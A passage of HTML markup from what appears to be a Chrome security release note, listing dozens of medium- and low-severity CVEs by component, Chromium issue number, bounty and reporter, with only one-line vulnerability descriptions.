2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513508305"><span>513508305</span></a><span>]</span><span> Medium </span><span>CVE-2026-13955: Insufficient validation of untrusted input in CustomTabs. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513515168"><span>513515168</span></a><span>]</span><span> Medium </span><span>CVE-2026-13956: Incorrect security UI in PageInfo. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513553557"><span>513553557</span></a><span>]</span><span> Medium </span><span>CVE-2026-13957: Incorrect security UI in Extensions. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513567306"><span>513567306</span></a><span>]</span><span> Medium </span><span>CVE-2026-13958: Uninitialized Use in Codecs. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513609249"><span>513609249</span></a><span>]</span><span> Medium </span><span>CVE-2026-13959: Insufficient validation of untrusted input in Blink. </span><span>Reported by Google on 2026-05-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513714023"><span>513714023</span></a><span>]</span><span> Medium </span><span>CVE-2026-13960: Inappropriate implementation in Passwords. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513719481"><span>513719481</span></a><span>]</span><span> Medium </span><span>CVE-2026-13961: Insufficient validation of untrusted input in DevTools. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513721370"><span>513721370</span></a><span>]</span><span> Medium </span><span>CVE-2026-13962: Insufficient data validation in PDF. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513727626"><span>513727626</span></a><span>]</span><span> Medium </span><span>CVE-2026-13963: Inappropriate implementation in DevTools. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513735096"><span>513735096</span></a><span>]</span><span> Medium </span><span>CVE-2026-13964: Insufficient policy enforcement in WebView. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513737952"><span>513737952</span></a><span>]</span><span> Medium </span><span>CVE-2026-13965: Use after free in Oilpan. </span><span>Reported by Google on 2026-05-16<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513741393"><span>513741393</span></a><span>] </span><span>Medium </span><span>CVE-2026-13966: Inappropriate implementation in History. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513751951"><span>513751951</span></a><span>] </span><span>Medium </span><span>CVE-2026-13967: Type Confusion in V8. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513762145"><span>513762145</span></a><span>] </span><span>Medium </span><span>CVE-2026-13968: Insufficient validation of untrusted input in DevTools. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513762962"><span>513762962</span></a><span>] </span><span>Medium </span><span>CVE-2026-13969: Uninitialized Use in UI. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513779283"><span>513779283</span></a><span>]</span><span> </span><span>Medium </span><span>CVE-2026-13970: Uninitialized Use in Media. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513780208"><span>513780208</span></a><span>]</span><span> </span><span>Medium </span><span>CVE-2026-13971: Uninitialized Use in Skia. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513792140"><span>513792140</span></a><span>]</span><span> Medium </span><span>CVE-2026-13972: Inappropriate implementation in Paint. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513832989"><span>513832989</span></a><span>]</span><span> Medium </span><span>CVE-2026-13973: Inappropriate implementation in UI. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513850475"><span>513850475</span></a><span>]</span><span> Medium </span><span>CVE-2026-13974: Integer overflow in Safe Browsing. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513857658"><span>513857658</span></a><span>] </span><span>Medium </span><span>CVE-2026-13975: Out of bounds read in ANGLE. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513858286"><span>513858286</span></a><span>] </span><span>Medium </span><span>CVE-2026-13976: Heap buffer overflow in Storage. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513859894"><span>513859894</span></a><span>] </span><span>Medium </span><span>CVE-2026-13977: Inappropriate implementation in HTMLParser. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513866949"><span>513866949</span></a><span>] </span><span>Medium </span><span>CVE-2026-13978: Insufficient policy enforcement in PageInfo. </span><span>Reported by Google on 2026-05-16</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513988889"><span>513988889</span></a><span>] </span><span>Medium </span><span>CVE-2026-13979: Inappropriate implementation in Paint. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513989973"><span>513989973</span></a><span>] </span><span>Medium </span><span>CVE-2026-13980: Incorrect security UI in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513990408"><span>513990408</span></a><span>] </span><span>Medium </span><span>CVE-2026-13981: Inappropriate implementation in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514006829"><span>514006829</span></a><span>]</span><span> Medium </span><span>CVE-2026-13982: Incorrect security UI in Passwords. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514009910"><span>514009910</span></a><span>] </span><span>Medium </span><span>CVE-2026-13983: Incorrect security UI in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514010404"><span>514010404</span></a><span>] </span><span>Medium </span><span>CVE-2026-13984: Incorrect security UI in TabStrip. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514013849"><span>514013849</span></a><span>] </span><span>Medium </span><span>CVE-2026-13985: Inappropriate implementation in MediaCapture. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514020959"><span>514020959</span></a><span>] </span><span>Medium </span><span>CVE-2026-13986: Inappropriate implementation in Media UI. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514039122"><span>514039122</span></a><span>] </span><span>Medium </span><span>CVE-2026-13987: Incorrect security UI in Mobile. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514040614"><span>514040614</span></a><span>] </span><span>Medium </span><span>CVE-2026-13988: Inappropriate implementation in Paint. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514056221"><span>514056221</span></a><span>] </span><span>Medium </span><span>CVE-2026-13989: Insufficient policy enforcement in PageInfo. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514058439"><span>514058439</span></a><span>] </span><span>Medium </span><span>CVE-2026-13990: Insufficient validation of untrusted input in DataTransfer. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514061117"><span>514061117</span></a><span>] </span><span>Medium </span><span>CVE-2026-13991: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514063409"><span>514063409</span></a><span>] </span><span>Medium </span><span>CVE-2026-13992: Inappropriate implementation in UI. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514064139"><span>514064139</span></a><span>] </span><span>Medium </span><span>CVE-2026-13993: Incorrect security UI in WebAppInstalls. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514067416"><span>514067416</span></a><span>] </span><span>Medium </span><span>CVE-2026-13994: Inappropriate implementation in Credential Management. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514067524"><span>514067524</span></a><span>] </span><span>Medium </span><span>CVE-2026-13995: Insufficient validation of untrusted input in Autofill. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514068972"><span>514068972</span></a><span>] </span><span>Medium </span><span>CVE-2026-13996: Incorrect security UI in Permissions. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514069689"><span>514069689</span></a><span>] </span><span>Medium </span><span>CVE-2026-13997: Incorrect security UI in Extensions. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514070501"><span>514070501</span></a><span>] </span><span>Medium </span><span>CVE-2026-13998: Incorrect security UI in File Input. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514071697"><span>514071697</span></a><span>] </span><span>Medium </span><span>CVE-2026-13999: Inappropriate implementation in Extensions. </span><span>Reported by Google on 2026-05-17</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514461552"><span>514461552</span></a><span>] </span><span>Medium </span><span>CVE-2026-14000: Inappropriate implementation in XML. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514481943"><span>514481943</span></a><span>] </span><span>Medium </span><span>CVE-2026-14001: Inappropriate implementation in Network. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514489361"><span>514489361</span></a><span>] </span><span>Medium </span><span>CVE-2026-14002: Inappropriate implementation in Geolocation. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514503077"><span>514503077</span></a><span>] </span><span>Medium </span><span>CVE-2026-14003: Insufficient policy enforcement in Extensions. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514538751"><span>514538751</span></a><span>] </span><span>Medium </span><span>CVE-2026-14004: Inappropriate implementation in CSS. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/514740273"><span>514740273</span></a><span>] </span><span>Medium </span><span>CVE-2026-14005: Use after free in Omnibox. </span><span>Reported by Google on 2026-05-19</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/515423596"><span>515423596</span></a><span>] </span><span>Medium </span><span>CVE-2026-14006: Use after free in Navigation. </span><span>Reported by Google on 2026-05-21</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/516425999"><span>516425999</span></a><span>] </span><span>Medium </span><span>CVE-2026-14007: Insufficient policy enforcement in PermissionsPolicy. </span><span>Reported by Google on 2026-05-25</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/516781007"><span>516781007</span></a><span>] </span><span>Medium </span><span>CVE-2026-14008: Uninitialized Use in WebXR. </span><span>Reported by Google on 2026-05-26</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/516819850"><span>516819850</span></a><span>] </span><span>Medium </span><span>CVE-2026-14009: Insufficient data validation in Passwords. </span><span>Reported by Google on 2026-05-26</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/516924151"><span>516924151</span></a><span>] </span><span>Medium </span><span>CVE-2026-14010: Uninitialized Use in Codecs. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/516944556"><span>516944556</span></a><span>] </span><span>Medium </span><span>CVE-2026-14011: Out of bounds read in SurfaceCapture. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517110749"><span>517110749</span></a><span>] </span><span>Medium </span><span>CVE-2026-14012: Side-channel information leakage in CSS. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517114175"><span>517114175</span></a><span>] </span><span>Medium </span><span>CVE-2026-14013: Inappropriate implementation in SVG. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517155893"><span>517155893</span></a><span>] </span><span>Medium </span><span>CVE-2026-14014: Inappropriate implementation in Paint. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517207235"><span>517207235</span></a><span>] </span><span>Medium </span><span>CVE-2026-14015: Inappropriate implementation in WebRTC. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517234388"><span>517234388</span></a><span>] </span><span>Medium </span><span>CVE-2026-14016: Insufficient policy enforcement in SVG. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517241992"><span>517241992</span></a><span>] </span><span>Medium </span><span>CVE-2026-14017: Inappropriate implementation in Navigation. </span><span>Reported by Google on 2026-05-27</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517350251"><span>517350251</span></a><span>] </span><span>Medium </span><span>CVE-2026-14018: Use after free in Updater. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517455455"><span>517455455</span></a><span>] </span><span>Medium </span><span>CVE-2026-14019: Inappropriate implementation in Passwords. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517598518"><span>517598518</span></a><span>] </span><span>Medium </span><span>CVE-2026-14020: Insufficient validation of untrusted input in WebXR. </span><span>Reported by Google on 2026-05-28</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517731924"><span>517731924</span></a><span>] </span><span>Medium </span><span>CVE-2026-14021: Insufficient validation of untrusted input in StorageAccessAPI. </span><span>Reported by Google on 2026-05-29</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/517791835"><span>517791835</span></a><span>] </span><span>Medium </span><span>CVE-2026-14022: Insufficient validation of untrusted input in Network. </span><span>Reported by Google on 2026-05-29</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/518063436"><span>518063436</span></a><span>] </span><span>Medium </span><span>CVE-2026-14023: Insufficient validation of untrusted input in SanitizerAPI. </span><span>Reported by Google on 2026-05-30</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/518245882"><span>518245882</span></a><span>] </span><span>Medium </span><span>CVE-2026-14024: Use after free in Ozone. </span><span>Reported by Google on 2026-05-30</span></div><div><span>[$2000][</span><a href="https://issues.chromium.org/issues/506482786"><span>506482786</span></a><span>]</span><span> Low </span><span>CVE-2026-14025: Use after free in Views. </span><span>Reported by asjidkalam on 2026-04-26<br></span><span>[$1000][</span><a href="https://issues.chromium.org/issues/507263861"><span>507263861</span></a><span>]</span><span> Low </span><span>CVE-2026-14026: Incorrect security UI in SplitView. </span><span>Reported by adisahilna35@gmail.com on 2026-04-28<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/361375787"><span>361375787</span></a><span>]</span><span> Low </span><span>CVE-2026-14027: Use after free in SignIn. </span><span>Reported by Sven Dysthe (@svn-dys) on 2024-08-21<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/401816601"><span>401816601</span></a><span>]</span><span> Low </span><span>CVE-2026-14028: Incorrect security UI in Chrome for iOS. </span><span>Reported by Ameen Basha M K on 2025-03-09<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/488762971"><span>488762971</span></a><span>]</span><span> Low </span><span>CVE-2026-14030: Incorrect security UI in SplitView. </span><span>Reported by Khalil Zhani on 2026-03-01<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/495459838"><span>495459838</span></a><span>]</span><span> Low </span><span>CVE-2026-14031: Incorrect security UI in File Input. </span><span>Reported by Google on 2026-03-23<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/495783474"><span>495783474</span></a><span>]</span><span> Low </span><span>CVE-2026-14032: Use after free in Bluetooth. </span><span>Reported by Google on 2026-03-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/495848160"><span>495848160</span></a><span>]</span><span> Low </span><span>CVE-2026-14033: Insufficient policy enforcement in Media. </span><span>Reported by Google on 2026-03-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496368832"><span>496368832</span></a><span>]</span><span> Low </span><span>CVE-2026-14034: Inappropriate implementation in WebXR. </span><span>Reported by Google on 2026-03-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496371586"><span>496371586</span></a><span>]</span><span> Low </span><span>CVE-2026-14035: Insufficient policy enforcement in Bluetooth. </span><span>Reported by Google on 2026-03-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496411061"><span>496411061</span></a><span>]</span><span> Low </span><span>CVE-2026-14036: Insufficient policy enforcement in Bluetooth. </span><span>Reported by Google on 2026-03-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/496522611"><span>496522611</span></a><span>]</span><span> Low </span><span>CVE-2026-14037: Insufficient policy enforcement in GPU. </span><span>Reported by Google on 2026-03-26<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497241148"><span>497241148</span></a><span>]</span><span> Low </span><span>CVE-2026-14038: Insufficient validation of untrusted input in New Tab Page. </span><span>Reported by Google on 2026-03-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497358012"><span>497358012</span></a><span>]</span><span> Low </span><span>CVE-2026-14039: Insufficient policy enforcement in GetUserMedia. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497488593"><span>497488593</span></a><span>]</span><span> Low </span><span>CVE-2026-14040: Use after free in BrowserTag. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497544822"><span>497544822</span></a><span>]</span><span> Low </span><span>CVE-2026-14041: Insufficient policy enforcement in Serial. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497558336"><span>497558336</span></a><span>]</span><span> Low </span><span>CVE-2026-14042: Inappropriate implementation in Isolated Web Apps. </span><span>Reported by Google on 2026-03-29<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497632232"><span>497632232</span></a><span>]</span><span> Low </span><span>CVE-2026-14043: Use after free in GetUserMedia. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497670996"><span>497670996</span></a><span>]</span><span> Low </span><span>CVE-2026-14044: Use after free in ANGLE. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497723649"><span>497723649</span></a><span>]</span><span> Low </span><span>CVE-2026-14045: Insufficient validation of untrusted input in Network. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/497959724"><span>497959724</span></a><span>]</span><span> Low </span><span>CVE-2026-14046: Inappropriate implementation in CustomTabs. </span><span>Reported by Google on 2026-03-30<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/498864176"><span>498864176</span></a><span>]</span><span> Low </span><span>CVE-2026-14047: Insufficient policy enforcement in Extensions. </span><span>Reported by Google on 2026-04-02<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/499189601"><span>499189601</span></a><span>]</span><span> Low </span><span>CVE-2026-14048: Use after free in Chromecast. </span><span>Reported by Google on 2026-04-03<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501659888"><span>501659888</span></a><span>]</span><span> Low </span><span>CVE-2026-14049: Inappropriate implementation in GPU. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501708647"><span>501708647</span></a><span>]</span><span> Low </span><span>CVE-2026-14050: Insufficient policy enforcement in Passwords. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501747804"><span>501747804</span></a><span>]</span><span> Low </span><span>CVE-2026-14051: Uninitialized Use in GamepadAPI. </span><span>Reported by Google on 2026-04-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501810874"><span>501810874</span></a><span>]</span><span> Low </span><span>CVE-2026-14052: Insufficient policy enforcement in FileSystem. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501836539"><span>501836539</span></a><span>]</span><span> Low </span><span>CVE-2026-14053: Insufficient policy enforcement in Extensions. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501851312"><span>501851312</span></a><span>]</span><span> Low </span><span>CVE-2026-14054: Insufficient policy enforcement in Network. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501857663"><span>501857663</span></a><span>]</span><span> Low </span><span>CVE-2026-14055: Insufficient validation of untrusted input in Device Trust. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/501888426"><span>501888426</span></a><span>]</span><span> Low </span><span>CVE-2026-14056: Insufficient validation of untrusted input in Media. </span><span>Reported by Google on 2026-04-12<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502212647"><span>502212647</span></a><span>]</span><span> Low </span><span>CVE-2026-14057: Insufficient policy enforcement in FedCM. </span><span>Reported by Google on 2026-04-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502354038"><span>502354038</span></a><span>]</span><span> Low </span><span>CVE-2026-14058: Policy bypass in Parser. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502363986"><span>502363986</span></a><span>]</span><span> Low </span><span>CVE-2026-14059: Insufficient policy enforcement in Related-Website-Sets. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502372527"><span>502372527</span></a><span>]</span><span> Low </span><span>CVE-2026-14060: Insufficient validation of untrusted input in Chromoting. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502434484"><span>502434484</span></a><span>]</span><span> Low </span><span>CVE-2026-14061: Inappropriate implementation in Dawn. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502448128"><span>502448128</span></a><span>]</span><span> Low </span><span>CVE-2026-14062: Inappropriate implementation in Views. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502473563"><span>502473563</span></a><span>]</span><span> Low </span><span>CVE-2026-14063: Out of bounds memory access in Chromecast. </span><span>Reported by Google on 2026-04-14<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/502714977"><span>502714977</span></a><span>]</span><span> Low </span><span>CVE-2026-14064: Use after free in PageInfo. </span><span>Reported by Google on 2026-04-15<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503617508"><span>503617508</span></a><span>]</span><span> Low </span><span>CVE-2026-14065: Insufficient validation of untrusted input in PageInfo. </span><span>Reported by Google on 2026-04-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/503779807"><span>503779807</span></a><span>]</span><span> Low </span><span>CVE-2026-14066: Insufficient validation of untrusted input in Chrome for iOS. </span><span>Reported by Google on 2026-04-17<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504069465"><span>504069465</span></a><span>]</span><span> Low </span><span>CVE-2026-14067: Use after free in Chrome for iOS. </span><span>Reported by Google on 2026-04-18<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/504210171"><span>504210171</span></a><span>]</span><span> Low </span><span>CVE-2026-14068: Inappropriate implementation in Omnibox. </span><span>Reported by Google on 2026-04-19<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/505136542"><span>505136542</span></a><span>]</span><span> Low </span><span>CVE-2026-14069: Integer overflow in WebNN. </span><span>Reported by Google on 2026-04-21<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/505137978"><span>505137978</span></a><span>]</span><span> Low </span><span>CVE-2026-14070: Uninitialized Use in WebNN. </span><span>Reported by Google on 2026-04-21<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/506143724"><span>506143724</span></a><span>]</span><span> Low </span><span>CVE-2026-14071: Side-channel information leakage in WebAudio. </span><span>Reported by Google on 2026-04-24<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/507099867"><span>507099867</span></a><span>]</span><span> Low </span><span>CVE-2026-14072: Incorrect security UI in SplitView. </span><span>Reported by FARISSAL B on 2026-04-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/507237563"><span>507237563</span></a><span>]</span><span> Low </span><span>CVE-2026-14073: Insufficient policy enforcement in WebXR. </span><span>Reported by Google on 2026-04-28<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511743480"><span>511743480</span></a><span>]</span><span> Low </span><span>CVE-2026-14074: Side-channel information leakage in WebAuthentication. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511808800"><span>511808800</span></a><span>]</span><span> Low </span><span>CVE-2026-14075: Policy bypass in Chrome for iOS. </span><span>Reported by Google on 2026-05-10<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/511815165"><span>511815165</span></a><span>]</span><span> Low </span><span>CVE-2026-14076: Policy bypass in Network. </span><span>Reported by Google on 2026-05-10<br></span><span>[TBD][</span><a href="https://issues.chromium.org/issues/511869411"><span>511869411</span></a><span>]</span><span> Low </span><span>CVE-2026-14077: Incorrect security UI in Select. </span><span>Reported by pwn.ai on 2026-05-11<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512953564"><span>512953564</span></a><span>]</span><span> Low </span><span>CVE-2026-14078: Policy bypass in WebRTC. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512971938"><span>512971938</span></a><span>]</span><span> Low </span><span>CVE-2026-14079: Policy bypass in Network. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/512997517"><span>512997517</span></a><span>]</span><span> Low </span><span>CVE-2026-14080: Insufficient validation of untrusted input in TabSwitcher. </span><span>Reported by Google on 2026-05-13<br></span><span>[N/A][</span><a href="https://issues.chromium.org/issues/513030698"><span>513030698</span></a><span>]</span><span> Low </span><span>CVE-2026-14081: Insufficient policy enforcement in DevTools. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513049578"><span>513049578</span></a><span>] </span><span>Low </span><span>CVE-2026-14082: Race in Storage. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513128322"><span>513128322</span></a><span>] </span><span>Low </span><span>CVE-2026-14083: Insufficient validation of untrusted input in HTML. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513138148"><span>513138148</span></a><span>] </span><span>Low </span><span>CVE-2026-14084: Insufficient validation of untrusted input in Chromoting. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513155863"><span>513155863</span></a><span>] </span><span>Low </span><span>CVE-2026-14085: Side-channel information leakage in CSS. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513169718"><span>513169718</span></a><span>] </span><span>Low </span><span>CVE-2026-14086: Insufficient policy enforcement in HID. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513177237"><span>513177237</span></a><span>] </span><span>Low </span><span>CVE-2026-14087: Insufficient validation of untrusted input in WebNN. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513178869"><span>513178869</span></a><span>] </span><span>Low </span><span>CVE-2026-14088: Uninitialized Use in Canvas. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513188254"><span>513188254</span></a><span>] </span><span>Low </span><span>CVE-2026-14089: Insufficient validation of untrusted input in PopupBlocker. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513194241"><span>513194241</span></a><span>] </span><span>Low </span><span>CVE-2026-14090: Out of bounds read in CameraCapture. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513208773"><span>513208773</span></a><span>] </span><span>Low </span><span>CVE-2026-14091: Use after free in DevTools. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513212892"><span>513212892</span></a><span>] </span><span>Low </span><span>CVE-2026-14092: Insufficient policy enforcement in Privacy. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a href="https://issues.chromium.org/issues/513240099"><span>513240099</span></a><span>] </span><span>Low </span><span>CVE-2026-14093: Use after free in Cast. </span><span>Reported by Google on 2026-05-14</span></div><div><span>[N/A][</span><a 